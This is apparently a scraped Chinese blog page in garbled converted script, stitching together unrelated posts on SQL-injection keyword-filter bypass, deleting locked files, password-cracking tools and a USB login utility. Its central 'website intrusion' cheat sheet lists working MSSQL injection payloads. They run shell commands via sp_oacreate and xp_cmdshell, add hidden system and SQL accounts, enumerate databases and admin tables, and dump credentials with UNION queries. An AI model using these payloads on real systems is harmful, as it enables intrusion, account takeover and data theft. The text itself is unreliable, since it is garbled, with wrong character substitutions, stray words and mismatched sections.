SQL注入:突破關鍵字過濾

時間 2019-11-20

標籤 sql 注入突破關鍵字過濾欄目 SQL 简体版

原文原文鏈接

一直以來都覺得只有空格，tab鍵和註釋符/**/能夠用來切割sql關鍵字，段時間在邪八看了風迅cms注入漏洞那篇帖子，才知道原來回車也能夠用來做爲分割符（之前居然沒有想到，真是失敗）。回車的ascii碼是chr(13)&chr(10)，至於爲何要兩個連在一塊兒，這個我也不知道。轉換成url編碼形式是%0d%0a，因而就能夠用%0d%0a代替空格pass一些過濾空格的檢查了。mysql

　　引伸一下，只用%0d能正常執行語句嗎？只用%0a呢？測試證實，用任意一種分割在mssql、mysql和access裏面都是能夠的。web

　　另外，關於mssql的多語句問題。我之前一直覺得必須用分號做爲語句的結尾，後來發現，徹底不是那樣。相似算法

　　select * from table exec xp_cmdshell'xxxxxxxxxx'sql

　　select * from table/**/exec xp_cmdshell'xxxxxxxxxx'shell

　　select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'數據庫

　　select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'windows

　　的語句都是能夠正常執行的。而我之前居然一直不知道！不過這個貌似跟鏈接數據庫驅動有關係，odbc能夠正常執行，sqloledb的話就會報錯。有興趣的繼續研究吧J安全

　　這樣，之後遇到帶空格過濾關鍵字的攔截程序，又能夠發揮發揮了。可能你們早就知道了，無論怎麼說，發在這裏吧！服務器

　　最近想起可能還有些ascii碼能夠用來在sql語句中代替空格，因而寫個腳本測試了一下，結果在全部128個低位ascii字符中，chr(12)也能夠在access裏用，不過貌似chr(12)不能出如今and、or之類的關鍵詞附近，緣由不清楚。mysql中比access多一個chr(11)能夠。至於mssql，挖日，直接從1到32的ascii碼換成字符後均可以正常使用。網絡

當遇到刪不掉的文件應該怎樣處理

在刪除某個文件時，系統會給出各類各樣的提示，反正就是死活不讓刪。形成這種狀況的緣由主要有三種：一是文件正在被系統使用，二是文件名中包含系統沒法識別的字符，三是用戶權限不夠。咱們主要研究前兩種狀況，下面作了個整理，幫你解決這個問題。

　　1、基本型

　　1.分步刪除。若是你刪除的是一個文件夾，能夠嘗試先將文件夾中的文件刪除，而後再刪除該文件夾。還有一種辦法是在該文件夾下面新建一個文件，再對文件夾執行刪除操做。

　　2.更名刪除。將不能刪除的文件或文件夾更名後再刪除。

　　3.結束進程再刪除。當你在刪除文件時，若是系統提示"文件正在使用"，首先檢查一下是否沒有退出與被刪文件相關的程序，再看看系統進程中是否還有相關進程保留。這種狀況經常出如今咱們卸載軟件後刪除軟件殘留在系統中文件的時候。

　　4.重啓後再刪除。

　　5.換個系統再刪除。使用多系統的朋友能夠切換到另一個系統中執行刪除操做，這招比較有效。單系統的朋友則能夠在DOS下使用RD(刪除目錄)或delete命令(刪除文件)或者進入到安全模式底下進行刪除操做。

　　6.結束掉Explorer進程後再刪除。按下Ctrl+Alt+Del鍵打開任務管理器，切換到"進程"選項卡，結束掉Explorer進程，這時候桌面會丟失，不用着急，運行"文件→新任務"，輸入"cmd"後回車打開命令行窗口，進入待刪文件所在目錄，用RD或delete命令刪除便可。刪除完畢後再次運行"文件→新任務"命令，輸入"explorer"後回車，桌面又回來了。

　　7.關閉預覽功能再刪除。若是你在資源管理器中使用了視頻、圖片的預覽功能，那麼在刪除此類文件時經常不成功，解決的辦法是關閉該功能：Windows XP用戶在"開始→運行"中輸入"regsvr32 /u shmedia.dll"便可，Windows 2000用戶則在資源管理器中的空白處單擊鼠標右鍵，選擇"自定義文件夾"選項，會出現自定義文件夾嚮導，進入到"請選擇模板"窗口後，選擇其中的"簡易"即可以禁止視頻預覽了。

　　2、移花接木型

　　1.覆蓋文件再刪除。在硬盤的另外區域新建一個和待刪文件同名的文件，而後剪切並覆蓋待刪文件，最後再刪除該文件。

　　2.請經常使用軟件"兼職"刪除。咱們可使用Winrar、FlashFXP、Nero、ACDSee來刪除頑固文件，這種方法每每有奇效。使用方法很是簡單，以FlashFXP爲例，只需在本地目錄中瀏覽到待刪文件，對其執行刪除操做便可。

　　注意：使用Winrar來刪除文件的方法跟其它軟件不一樣，步驟以下：右鍵單擊待刪除文件或者文件夾，選擇"添加到檔案文件"菜單，在談出窗口中勾選"存檔後刪除源文件"，單擊"肯定"，這樣Winrar在建立壓縮文件的同時，也會幫咱們刪除頑固的文件，咱們只須要將建立的壓縮文件刪除便可。

　　3.在別的機器上刪除。若是你處於局域網中，能夠嘗試將待刪文件所在的文件夾的屬性設置爲共享，並賦予讀寫權限，而後經過網上鄰居或在所在的局域網內的其它的電腦上打開文件夾，執行刪除操做。另外若是你電腦中安裝了FTP服務器，咱們還能夠試試從FTP登陸本機，而後刪除待刪文件。

　　4.使用專業刪除軟件。大名鼎鼎的PC Tools這款小軟件能夠刪除幾乎全部"頑固"軟件。運行軟件後，先按任意鍵進入軟件的主界面，而後按下F10並切換選中待刪文件，按下D鍵並確認操做便可刪除。

入侵網站必備(經典語句）

反向PING本身實驗

;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加賬號

;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank> _OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--

建立一個虛擬目錄E盤：

;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默認Web站點" -v "e","e： \"--

訪問屬性：（配合寫入一個webshell）

declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

爆庫特殊_blank>技巧：:%5c=\ 或者把/和\ 修改%5提交

and 0<>(select top 1 paths from newtable)--

獲得庫名（從1到5都是系統的id，6以上才能夠判斷）

and 1=(select name from master.dbo.sysdatabases where dbid=7)--

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

依次提交 dbid = 7,8,9.... 獲得更多的_blank>數據庫名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表假設爲 admin

and 0 <>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來獲得其餘的表。

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

and uid>(str (id))) 暴到UID的數值假設爲18779569 uid=id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 獲得一個admin的一個字段,假設爲 user_blank>_id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in

(id,...)) 來暴出其餘的字段

and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 能夠獲得用戶名

依次能夠獲得_blank>密碼。。。。。假設存在user_blank>_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=U) 獲得表名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判斷id值

and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 全部字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union，access也好用)

獲得WEB路徑

;create table [dbo].[swap] ([swappass][char](255));--

and (select top 1 swappass from swap)=1--

;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM\CurrentControlSet \Services\W3SVC\Parameters\Virtual Roots\, @value_blank>_name=/, values=@test OUTPUT insert into paths (path) values(@test)--

;use ku1;--

;create table cmd (str image);-- 創建image類型的表cmd

存在xp_blank>_cmdshell的測試過程：

;exec master..xp_blank>_cmdshell dir

;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL賬號

分析口令攻擊技術

攻擊原理

　　攻擊者攻擊目標時經常把破譯用戶的口令做爲攻擊的開始。只要攻擊者能猜想或者肯定用戶的口令，他就能得到機器或者網絡的訪問權，並能訪問到用戶能訪問到的任何資源。若是這個用戶有域管理員或root用戶權限，這是極其危險的。

　分析口令攻擊這種方法的前提是必須先獲得該主機上的某個合法用戶的賬號，而後再進行合法用戶口令的破譯。得到普通用戶賬號的方法不少，如：

　　利用目標主機的Finger功能：當用Finger命令查詢時，主機系統會將保存的用戶資料（如用戶名、登陸時間等）顯示在終端或計算機上；

　　利用目標主機的X.500服務：有些主機沒有關閉X.500的目錄查詢服務，也給攻擊者提供了得到信息的一條簡易途徑；

　　從電子郵件地址中收集：有些用戶電子郵件地址常會透露其在目標主機上的賬號；查看主機是否有習慣性的賬號：有經驗的用戶都知道，不少系統會使用一些習慣性的賬號，形成賬號的泄露。

　　這又有三種方法：

　　(1)是經過網絡監聽非法獲得用戶口令，這類方法有必定的侷限性，但危害性極大。監聽者每每採用中途截擊的方法也是獲取用戶賬戶和密碼的一條有效途徑。當前，不少協議根本就沒有采用任何加密或身份認證技術，如在Telnet、FTP、HTTP、SMTP等傳輸協議中，用戶賬戶和密碼信息都是以明文格式傳輸的，此時若攻擊者利用數據包截取工具即可很容易收集到你的賬戶和密碼。還有一種中途截擊攻擊方法，它在你同服務器端完成"三次握手"創建鏈接以後，在通訊過程當中扮演"第三者"的角色，假冒服務器身份欺騙你，再假冒你向服務器發出惡意請求，其形成的後果不堪設想。另外，攻擊者有時還會利用軟件和硬件工具時刻監視系統主機的工做，等待記錄用戶登陸信息，從而取得用戶密碼；或者編制有緩衝區溢出錯誤的SUID程序來得到超級用戶權限。

　　(2)是在知道用戶的帳號後（如電子郵件@前面的部分）利用一些專門軟件強行破解用戶口令，這種方法不受網段限制，但攻擊者要有足夠的耐心和時間。如：採用字典窮舉法（或稱暴力法）來破解用戶的密碼。攻擊者能夠經過一些工具程序，自動地從電腦字典中取出一個單詞，做爲用戶的口令，再輸入給遠端的主機，申請進入系統；若口令錯誤，就按序取出下一個單詞，進行下一個嘗試，並一直循環下去，直到找到正確的口令或字典的單詞試完爲止。因爲這個破譯過程由計算機程序來自動完成，於是幾個小時就能夠把上十萬條記錄的字典裏全部單詞都嘗試一遍。

　　(3)是利用系統管理員的失誤。在現代的Unix操做系統中，用戶的基本信息存放在passwd文件中，而全部的口令則通過DES加密方法加密後專門存放在一個叫shadow的文件中。黑客們獲取口令文件後，就會使用專門的破解DES加密法的程序來解口令。同時，因爲爲數很多的操做系統都存在許多安全漏洞、Bug或一些其餘設計缺陷，這些缺陷一旦被找出，黑客就能夠長驅直入。例如，讓Windows95／98系統後門洞開的BO就是利用了Windows的基本設計缺陷。、放置特洛伊木馬程序

　　特洛伊木馬程序能夠直接侵入用戶的電腦並進行破壞，它常被假裝成工具程序或者遊戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網上直接下載，一旦用戶打開了這些郵件的附件或者執行了這些程序以後，它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬同樣留在本身的電腦中，並在本身的計算機系統中隱藏一個能夠在windows啓動時悄悄執行的程序。當您鏈接到因特網上時，這個程序就會通知攻擊者，來報告您的IP地址以及預先設定的端口。攻擊者在收到這些信息後，再利用這個潛伏在其中的程序，就能夠任意地修改你的計算機的參數設定、複製文件、窺視你整個硬盤中的內容等，從而達到控制你的計算機的目的。

　　口令攻擊類型

　　（1）字典攻擊

　　由於多數人使用普通詞典中的單詞做爲口令，發起詞典攻擊一般是較好的開端。詞典攻擊使用一個包含大多數詞典單詞的文件，用這些單詞猜想用戶口令。使用一部1萬個單詞的詞典通常能猜想出系統中70%的口令。在多數系統中，和嘗試全部的組合相比，詞典攻擊能在很短的時間內完成。

　　（2）強行攻擊

　　許多人認爲若是使用足夠長的口令，或者使用足夠完善的加密模式，就能有一個攻不破的口令。事實上沒有攻不破的口令，這只是個時間問題。若是有速度足夠快的計算機能嘗試字母、數字、特殊字符全部的組合，將最終能破解全部的口令。這種類型的攻擊方式叫強行攻擊。使用強行攻擊，先從字母a開始，嘗試aa、ab、ac等等，而後嘗試aaa、aab、aac ……。

　　攻擊者也能夠利用分佈式攻擊。若是攻擊者但願在儘可能短的時間內破解口令，他沒必要購買大量昂貴的計算機。他會闖入幾個有大批計算機的公司並利用他們的資源破解口令。

　　口令攻擊類型

　　（1）字典攻擊

　　（2）強行攻擊

　　（3）NTCrack

　　NTCrack是UNIX破解程序的一部分，可是在NT環境下破解。NTCrack與UNIX中的破解相似，可是NTCrack在功能上很是有限。它不象其餘程序同樣提取口令哈希，它和NTSweep的工做原理相似。必須給NTCrack一個user id和要測試的口令組合，而後程序會告訴用戶是否成功。

　　（4）PWDump2

　　PWDump2不是一個口令破解程序，可是它能用來從SAM數據庫中提取口令哈希。L0phtcrack已經內建了這個特徵，可是PWDump2仍是頗有用的。首先，它是一個小型的、易使用的命令行工具，能提取口令哈希；其次，目前不少狀況下L0phtcrack的版本不能提取口令哈希。如SYSTEM是一個能在NT下運行的程序，爲SAM數據庫提供了很強的加密功能，若是SYSTEM在使用，L0phtcrack就沒法提取哈希口令，可是PWDump2還能使用；並且要在windows2000下提取哈希口令，必須使用PWDump2，由於系統使用了更強的加密模式來保護信息。

　　UNIX口令破解程序：

　　（1） Crack

　　Crack是一個旨在快速定位UNIX口令弱點的口令破解程序。Crack使用標準的猜想技術肯定口令。它檢查口令是否爲以下狀況之一：和user id相同、單詞password、數字串、字母串。Crack經過加密一長串可能的口令，並把結果和用戶的加密口令相比較，看其是否匹配。用戶的加密口令必須是在運行破解程序以前就已經提供的。

　　（2） John the Ripper

　　UNIX口令破解程序，但也能在Windows平臺運行，功能強大、運行速度快，可進行字典攻擊和強行攻擊。

　　（3） XIT

　　XIT是一個執行詞典攻擊的UNIX口令破解程序。XIT的功能有限，由於它只能運行詞典攻擊，但程序很小、運行很快。

　　（4） Slurpie

　　Slurpie能執行詞典攻擊和定製的強行攻擊，要規定所須要使用的字符數目和字符類型。如，能夠可以Slurpie發起一次攻擊，使用7字符或8字符、僅使用小寫字母口令進行強行攻擊。

　　和John、Crack相比，Slurpie最大的優勢是它能分佈運行，Slurpie能把幾臺計算機組成一臺分佈式虛擬機器在很短的時間裏完成破解任務。

用U盤進入有密碼的Windows系統

教你用U盤進入有密碼的Windows系統 U盤現在能夠說很是普及了，不過，若是隻是把它用來存儲數據的話，也許有點惋惜了。其實，咱們還可讓U盤發揮更大的能量！今天小編教你一招，能讓你的U盤代替登陸系統的密碼，只有當你插上U盤才能正常進入系統操做，不然任何操做都沒法進入系統。怎麼樣，是否是頗有興趣一試？

要想成功實現上述功能，咱們須要藉助名爲Disklogon的小工具，它是一個功能強大的安全設置工具，可以讓咱們使用優盤、軟盤等移動設備來登陸系統，可在登陸時免於輸入用戶名和登陸密碼；而一旦移走了這些設備，系統即可以設置爲自動鎖定或關機。下面就來看看如何設置讓優盤變成控制登陸系統的"密鑰盤"。

點擊進入Disklogon下載頁面

完成軟件安裝以後按要求從新啓動，以後在進入系統的畫面中單擊"Password"按鈕，而後使用鍵盤輸入密碼登陸（若是以前設置了使用密碼登陸的話）。但咱們是不但願每次都這樣繁瑣的，下面就來設置一下讓優盤發揮更強大的功能，讓它直接來控制系統登陸。

直接開始菜單中單擊"Disklogon Options"進入設置界面，隨後依次執行以下步驟設定:

Step1：依次執行"Options/Disklogon/Disks"操做，窗口右側中默認將全部的盤符都勾選了，但咱們只但願用優盤來做爲密鑰盤，因此只勾選優盤的盤符（例如筆者的爲L:）。

Step2：單擊窗口左側的"Options/DiskLogon/General"分支，接下來，咱們要在右側設置有優盤和無優盤時的不一樣操做：

1.在"Disk removal behavior"下拉列表框中選擇"Lock computer when the disk is removed"（當磁盤被取出後將電腦鎖定），這樣當優盤被拔除後系統就自動鎖定了；若是想在拔除優盤後自動註銷，則可選擇"Log off when the disk is removed"。

2.在"Log on to Windows"下拉列表框中選擇"Log on when disk is connected"（當連接有優盤時自動登陸系統），這樣，若是在開機後沒有鏈接優盤，則不能進入系統。

3.在"Unlock computer"下拉列表框中選擇"Unlock computer when the disk is connected"（當連上優盤時自動解除對系統的鎖定）。

小貼士：默認狀況下，系統登陸時，若是沒有沒有鏈接優盤，用戶可點擊"Cancel"而後手工輸入用戶名和密碼來進入系統。但爲了加強安全性，去掉"Allow users to type their usename and password to log on or unlock computer"（容許用戶輸入用戶名和密碼來登陸或解鎖系統）選項！如此一來沒有優盤插入就沒法登錄系統了。

控制系統登陸之建立登陸信息

Step3：完成上述設置後，咱們就能夠進行最後一步設置了，即登陸系統解鎖時所用的用戶名和密碼。點擊進入"User Accounts"標籤，隨後點擊"Change Logon information"區域處的"Change"按鈕，進入用戶名、密碼建立界面（圖2）。具體步驟：在"Step1"區域選擇當前系統中正在使用的U盤，接着點擊"Step2"區域選擇某ID號（如01），此時"Create New"將呈現可用狀態，點擊該按鈕，並在隨後的彈出窗口中輸入用戶名及密碼便可。

若是但願用加密算法對登陸信息進行加密，可勾選對話框中的"Encrypt this logon information with strong encryption algorithm"選項。添加完成後單擊"close"按鈕返回主窗口。

小貼士：設置了登陸用戶名和密碼後，優盤根目錄下會生成一個名爲logon.dln的文件，這個文件不能刪除！不然，下次從新啓動時即便你插上了優盤，也會由於系統不能讀取"指紋"而致使進不了系統！

至此，全部相關設置已經完成，如今你的U盤就已是密鑰盤了。在沒有鏈接優盤的狀況下根本是沒法進入系統的；而在系統使用中途，若是將優盤拔除，系統便會自動鎖定-單擊對話框中的"Unlock"也是無效的，除非再次將優盤鏈接到電腦中。目前軟件只支持Windows 2000/XP/2003系統。